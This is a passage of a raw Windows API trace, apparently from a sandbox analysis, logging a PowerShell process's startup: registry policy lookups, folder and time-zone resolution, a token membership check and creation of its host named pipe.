pguid=0x59e188*(Data1=0x8f35d7f1, Data2=0x44fd, Data3=0x4c40, Data4=([0]=0x99, [1]=0xba, [2]=0x7c, [3]=0x7e, [4]=0x53, [5]=0x99, [6]=0x11, [7]=0x73))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x5f6e2a11, Data2=0xe018, Data3=0x4a38, Data4=([0]=0xb9, [1]=0xe8, [2]=0x7e, [3]=0xc2, [4]=0xa, [5]=0xa, [6]=0x31, [7]=0x77))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0xb695b611, Data2=0xf983, Data3=0x4572, Data4=([0]=0x94, [1]=0x45, [2]=0x3e, [3]=0xba, [4]=0x71, [5]=0x2c, [6]=0xa2, [7]=0xd3))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x6dc36828, Data2=0xa565, Data3=0x4713, Data4=([0]=0x91, [1]=0x6, [2]=0xfd, [3]=0xb8, [4]=0x94, [5]=0xfe, [6]=0x4, [7]=0xc))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x728e7e1f, Data2=0xbff9, Data3=0x41cb, Data4=([0]=0x8a, [1]=0xad, [2]=0x90, [3]=0x12, [4]=0xdc, [5]=0xb, [6]=0x4d, [7]=0xd1))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x79331fc0, Data2=0x9840, Data3=0x4462, Data4=([0]=0xb5, [1]=0x70, [2]=0x9f, [3]=0x39, [4]=0x20, [5]=0xa2, [6]=0x8b, [7]=0x3f))) returned 0x0 [0240.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x59dea4, nSize=0xfa | out: lpBuffer="䳆玩琉㟎\x14\x01徠玤哨֓") returned 0x0 [0240.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ea2c | out: phkResult=0x59ea2c*=0x5ec) returned 0x0 [0240.545] RegQueryValueExW (in: hKey=0x5ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59ea4c, lpData=0x0, lpcbData=0x59ea48*=0x0 | out: lpType=0x59ea4c*=0x1, lpData=0x0, lpcbData=0x59ea48*=0x56) returned 0x0 [0240.545] RegQueryValueExW (in: hKey=0x5ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59ea4c, lpData=0x497a2b8, lpcbData=0x59ea48*=0x56 | out: lpType=0x59ea4c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59ea48*=0x56) returned 0x0 [0240.545] RegCloseKey (hKey=0x5ec) returned 0x0 [0240.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x59e09c, nSize=0xfa | out: lpBuffer="䳆玩﯄㟎\x14\x01徠玤哨֓嬀玭\x01") returned 0x0 [0240.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e9fc | out: phkResult=0x59e9fc*=0x0) returned 0x2 [0240.555] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e9fc | out: phkResult=0x59e9fc*=0x0) returned 0x2 [0240.714] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0240.714] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0240.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e9a4 | out: phkResult=0x59e9a4*=0x608) returned 0x0 [0240.721] RegQueryValueExW (in: hKey=0x608, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e9c4, lpData=0x0, lpcbData=0x59e9c0*=0x0 | out: lpType=0x59e9c4*=0x1, lpData=0x0, lpcbData=0x59e9c0*=0x56) returned 0x0 [0240.721] RegQueryValueExW (in: hKey=0x608, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x59e9c4, lpData=0x4980644, lpcbData=0x59e9c0*=0x56 | out: lpType=0x59e9c4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x59e9c0*=0x56) returned 0x0 [0240.722] RegCloseKey (hKey=0x608) returned 0x0 [0241.010] CoTaskMemAlloc (cb=0x20c) returned 0x6d54df8 [0241.010] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6d54df8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Local") returned 0x0 [0241.017] CoTaskMemFree (pv=0x6d54df8) [0241.017] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1e [0241.017] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local", nBufferLength=0x1e, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local", lpFilePart=0x0) returned 0x1d [0241.018] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0241.018] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x3b, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell", lpFilePart=0x0) returned 0x3a [0241.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59ea24) returned 1 [0241.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\Windows\\PowerShell" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft\\windows\\powershell"), fInfoLevelId=0x0, lpFileInformation=0x59eaa0 | out: lpFileInformation=0x59eaa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3ec8443, ftCreationTime.dwHighDateTime=0x1d327c2, ftLastAccessTime.dwLowDateTime=0xdc924418, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xdc924418, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0241.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59ea20) returned 1 [0241.069] CoCreateGuid (in: pguid=0x59eab0 | out: pguid=0x59eab0*(Data1=0x67f24a91, Data2=0x8c6, Data3=0x41da, Data4=([0]=0xbd, [1]=0x50, [2]=0x56, [3]=0x4c, [4]=0xa7, [5]=0xe8, [6]=0x2, [7]=0xe3))) returned 0x0 [0241.073] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e990 | out: phkResult=0x59e990*=0x0) returned 0x2 [0241.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e990 | out: phkResult=0x59e990*=0x0) returned 0x2 [0241.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x59e02c, nSize=0xfa | out: lpBuffer="䳆玩﮴㟎\x14\x01徠玤哨֓䤀玩兩㟎") returned 0x0 [0241.089] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610 [0241.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59ea3c | out: lpConsoleScreenBufferInfo=0x59ea3c) returned 1 [0241.176] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59ea3c | out: lpConsoleScreenBufferInfo=0x59ea3c) returned 1 [0241.225] GetConsoleMode (in: hConsoleHandle=0x610, lpMode=0x59eaa0 | out: lpMode=0x59eaa0) returned 1 [0241.316] SetConsoleMode (hConsoleHandle=0x610, dwMode=0x7) returned 1 [0241.380] GetConsoleMode (in: hConsoleHandle=0x610, lpMode=0x59eaa0 | out: lpMode=0x59eaa0) returned 1 [0241.435] GetStdHandle (nStdHandle=0xfffffff6) returned 0x1e8 [0241.435] GetFileType (hFile=0x1e8) returned 0x3 [0241.435] GetConsoleMode (in: hConsoleHandle=0x1e8, lpMode=0x59e9b8 | out: lpMode=0x59e9b8) returned 0 [0241.436] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ea1c | out: phkResult=0x59ea1c*=0x0) returned 0x2 [0241.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ea1c | out: phkResult=0x59ea1c*=0x0) returned 0x2 [0241.440] GetConsoleCP () returned 0x1b5 [0241.489] GetCurrentConsoleFontEx (in: hConsoleOutput=0x610, bMaximumWindow=0, lpConsoleCurrentFontEx=0x59e9f0 | out: lpConsoleCurrentFontEx=0x59e9f0) returned 1 [0241.566] SetConsoleCtrlHandler (HandlerRoutine=0x4532c66, Add=1) returned 1 [0241.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x1ec [0241.567] GetFileType (hFile=0x1ec) returned 0x3 [0241.567] GetConsoleMode (in: hConsoleHandle=0x1ec, lpMode=0x59eabc | out: lpMode=0x59eabc) returned 0 [0241.574] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x59e2c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x59e2c8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0241.579] CoCreateGuid (in: pguid=0x59e97c | out: pguid=0x59e97c*(Data1=0x776e3d2b, Data2=0x772a, Data3=0x4e03, Data4=([0]=0x99, [1]=0xa6, [2]=0x7, [3]=0x21, [4]=0xca, [5]=0xd5, [6]=0xc6, [7]=0x54))) returned 0x0 [0241.591] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x59e9ac*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x59e9ac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0241.597] EtwEventRegister (in: ProviderId=0x49a1108, EnableCallback=0x4532c8e, CallbackContext=0x0, RegHandle=0x49a10e4 | out: RegHandle=0x49a10e4) returned 0x0 [0241.646] EtwEventSetInformation (RegHandle=0x8f93e8, InformationClass=0x4f, EventInformation=0x2, InformationLength=0x49a10b8) returned 0x0 [0241.825] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.825] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6d14a60 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0241.826] CoTaskMemFree (pv=0x6d14a60) [0241.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0241.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0241.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x59def8, nSize=0xfa | out: lpBuffer="䳆玩㟎\x14\x01徠玤哨֓开Қῴқ￿￿ረғ⏸\x82\x14\x01ሰғ徠玤ᡲ玣Ȕ") returned 0x0 [0241.828] GetCurrentProcessId () returned 0x13b8 [0241.829] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x13b8) returned 0x5f8 [0241.829] GetProcessTimes (in: hProcess=0x5f8, lpCreationTime=0x49a6778, lpExitTime=0x49a6780, lpKernelTime=0x49a6788, lpUserTime=0x49a6790 | out: lpCreationTime=0x49a6778, lpExitTime=0x49a6780, lpKernelTime=0x49a6788, lpUserTime=0x49a6790) returned 1 [0241.830] CloseHandle (hObject=0x5f8) returned 1 [0241.834] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x59d754 | out: pTimeZoneInformation=0x59d754) returned 0x2 [0241.841] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x59d838 | out: phkResult=0x59d838*=0x5f8) returned 0x0 [0241.843] RegQueryValueExW (in: hKey=0x5f8, lpValueName="TZI", lpReserved=0x0, lpType=0x59d854, lpData=0x0, lpcbData=0x59d850*=0x0 | out: lpType=0x59d854*=0x3, lpData=0x0, lpcbData=0x59d850*=0x2c) returned 0x0 [0241.843] RegQueryValueExW (in: hKey=0x5f8, lpValueName="TZI", lpReserved=0x0, lpType=0x59d854, lpData=0x49a7194, lpcbData=0x59d850*=0x2c | out: lpType=0x59d854*=0x3, lpData=0x49a7194*, lpcbData=0x59d850*=0x2c) returned 0x0 [0241.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x59d68c | out: phkResult=0x59d68c*=0x0) returned 0x2 [0241.846] RegQueryValueExW (in: hKey=0x5f8, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x59d82c, lpData=0x0, lpcbData=0x59d828*=0x0 | out: lpType=0x59d82c*=0x1, lpData=0x0, lpcbData=0x59d828*=0x20) returned 0x0 [0241.846] RegQueryValueExW (in: hKey=0x5f8, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x59d82c, lpData=0x49a75e8, lpcbData=0x59d828*=0x20 | out: lpType=0x59d82c*=0x1, lpData="@tzres.dll,-320", lpcbData=0x59d828*=0x20) returned 0x0 [0241.846] RegQueryValueExW (in: hKey=0x5f8, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x59d82c, lpData=0x0, lpcbData=0x59d828*=0x0 | out: lpType=0x59d82c*=0x1, lpData=0x0, lpcbData=0x59d828*=0x20) returned 0x0 [0241.846] RegQueryValueExW (in: hKey=0x5f8, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x59d82c, lpData=0x49a7640, lpcbData=0x59d828*=0x20 | out: lpType=0x59d82c*=0x1, lpData="@tzres.dll,-322", lpcbData=0x59d828*=0x20) returned 0x0 [0241.846] RegQueryValueExW (in: hKey=0x5f8, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x59d82c, lpData=0x0, lpcbData=0x59d828*=0x0 | out: lpType=0x59d82c*=0x1, lpData=0x0, lpcbData=0x59d828*=0x20) returned 0x0 [0241.846] RegQueryValueExW (in: hKey=0x5f8, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x59d82c, lpData=0x49a7698, lpcbData=0x59d828*=0x20 | out: lpType=0x59d82c*=0x1, lpData="@tzres.dll,-321", lpcbData=0x59d828*=0x20) returned 0x0 [0241.849] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.849] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6d14a60 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0241.849] CoTaskMemFree (pv=0x6d14a60) [0241.849] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.849] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x59d848, pwszFileMUIPath=0x6d14a60, pcchFileMUIPath=0x59d84c, pululEnumerator=0x59d840 | out: pwszLanguage=0x0, pcchLanguage=0x59d848, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x59d84c, pululEnumerator=0x59d840) returned 1 [0241.851] CoTaskMemFree (pv=0x0) [0241.851] CoTaskMemFree (pv=0x6d14a60) [0241.852] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6e90001 [0241.853] CoTaskMemAlloc (cb=0x3ec) returned 0x6d14a60 [0241.853] LoadStringW (in: hInstance=0x6e90001, uID=0x140, lpBuffer=0x6d14a60, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0241.854] CoTaskMemFree (pv=0x6d14a60) [0241.854] FreeLibrary (hLibModule=0x6e90001) returned 1 [0241.855] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.855] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6d14a60 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0241.855] CoTaskMemFree (pv=0x6d14a60) [0241.855] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.855] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x59d848, pwszFileMUIPath=0x6d14a60, pcchFileMUIPath=0x59d84c, pululEnumerator=0x59d840 | out: pwszLanguage=0x0, pcchLanguage=0x59d848, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x59d84c, pululEnumerator=0x59d840) returned 1 [0241.856] CoTaskMemFree (pv=0x0) [0241.856] CoTaskMemFree (pv=0x6d14a60) [0241.856] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6e90001 [0241.857] CoTaskMemAlloc (cb=0x3ec) returned 0x6d14a60 [0241.857] LoadStringW (in: hInstance=0x6e90001, uID=0x142, lpBuffer=0x6d14a60, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0241.857] CoTaskMemFree (pv=0x6d14a60) [0241.857] FreeLibrary (hLibModule=0x6e90001) returned 1 [0241.857] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.857] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6d14a60 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0241.858] CoTaskMemFree (pv=0x6d14a60) [0241.858] CoTaskMemAlloc (cb=0x20c) returned 0x6d14a60 [0241.858] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x59d848, pwszFileMUIPath=0x6d14a60, pcchFileMUIPath=0x59d84c, pululEnumerator=0x59d840 | out: pwszLanguage=0x0, pcchLanguage=0x59d848, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x59d84c, pululEnumerator=0x59d840) returned 1 [0241.858] CoTaskMemFree (pv=0x0) [0241.858] CoTaskMemFree (pv=0x6d14a60) [0241.858] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6e90001 [0241.859] CoTaskMemAlloc (cb=0x3ec) returned 0x6d14a60 [0241.859] LoadStringW (in: hInstance=0x6e90001, uID=0x141, lpBuffer=0x6d14a60, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0241.859] CoTaskMemFree (pv=0x6d14a60) [0241.859] FreeLibrary (hLibModule=0x6e90001) returned 1 [0241.861] RegCloseKey (hKey=0x5f8) returned 0x0 [0241.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x59594e8, Length=0x24a28, ResultLength=0x59da68 | out: SystemInformation=0x59594e8, ResultLength=0x59da68*=0x18d78) returned 0x0 [0241.965] CreateWellKnownSid (in: WellKnownSidType=0x1a, DomainSid=0x0, pSid=0x49d9738, cbSid=0x59da98 | out: pSid=0x49d9738*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), cbSid=0x59da98) returned 1 [0241.968] GetCurrentProcess () returned 0xffffffff [0241.968] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x59da44 | out: TokenHandle=0x59da44*=0x5f8) returned 1 [0241.968] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x59da48 | out: TokenInformation=0x0, ReturnLength=0x59da48) returned 0 [0241.968] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d33e18 [0241.968] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x8, TokenInformation=0x6d33e18, TokenInformationLength=0x4, ReturnLength=0x59da48 | out: TokenInformation=0x6d33e18, ReturnLength=0x59da48) returned 1 [0241.968] LocalFree (hMem=0x6d33e18) returned 0x0 [0241.968] DuplicateTokenEx (in: hExistingToken=0x5f8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x59da50 | out: phNewToken=0x59da50*=0x628) returned 1 [0241.968] CheckTokenMembership (in: TokenHandle=0x628, SidToCheck=0x49d9c58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x59da60 | out: IsMember=0x59da60) returned 1 [0241.969] CloseHandle (hObject=0x628) returned 1 [0242.016] CreateNamedPipeW (lpName="\\\\.\\pipe\\PSHost.132302824822703205.5048.DefaultAppDomain.powershell" (normalized: "\\device\\namedpipe\\pshost.132302824822703205.5048.defaultappdomain.powershell"), dwOpenMode=0x40080003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x8000, nInBufferSize=0x8000, nDefaultTimeOut=0x0, lpSecurityAttributes=0x59da04) returned 0x628 [0242.122] GetFileType (hFile=0x628) returned 0x3 [0242.239] CoTaskMemAlloc (cb=0x20c) returned 0x6db33a8 [0242.239] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0x6db33a8, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0242.239] CoTaskMemFree (pv=0x6db33a8) [0242.241] SetEnvironmentVariableW (lpName="PathEXT", lpValue=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 1 [0242.810] CoCreateGuid (in: pguid=0x59d8b0 | out: pguid=0x59d8b0*(Data1=0xf45b693d, Data2=0x4bc4, Data3=0x4627, Data4=([0]=0x8a, [1]=0x22, [2]=0xf2, [3]=0x12, [4]=0xce, [5]=0x9e, [6]=0xdc, [7]=0xd7))) returned 0x0 [0243.077] CoTaskMemAlloc (cb=0x20c) returned 0x86eb70 [0243.077] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x86eb70, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d [0243.077] CoTaskMemFree (pv=0x86eb70) [0243.078] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e70c, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e [0243.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e7e8 | out: phkResult=0x59e7e8*=0x674) returned 0x0 [0243.080] RegQueryValueExW (in: hKey=0x674, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x59e804, lpData=0x0, lpcbData=0x59e800*=0x0 | out: lpType=0x59e804*=0x2, lpData=0x0, lpcbData=0x59e800*=0xbc) returned 0x0 [0243.080] RegQueryValueExW (in: hKey=0x674, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x59e804, lpData=0x4a1f71c, lpcbData=0x59e800*=0xbc | out: lpType=0x59e804*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0x59e800*=0xbc) returned 0x0 [0243.080] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0x59e668, nSize=0x64 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0243.080] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0x59e668, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e [0243.080] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x59e668, nSize=0x64 | out: lpDst="C:\\WINDOWS") returned 0xb [0243.080] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e668, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0243.081] RegCloseKey (hKey=0x674) returned 0x0 [0243.082] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x59e70c, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0243.082] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e7e8 | out: phkResult=0x59e7e8*=0x674) returned 0x0 [0243.083] RegQueryValueExW (in: hKey=0x674, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x59e804, lpData=0x0, lpcbData=0x59e800*=0x0 | out: lpType=0x59e804*=0x0, lpData=0x0, lpcbData=0x59e800*=0x0) returned 0x2 [0243.083] RegCloseKey (hKey=0x674) returned 0x0 [0243.083] CoTaskMemAlloc (cb=0x20c) returned 0x86eb70 [0243.083] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x86eb70 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0243.083] CoTaskMemFree (pv=0x86eb70) [0243.083] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0243.083] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program 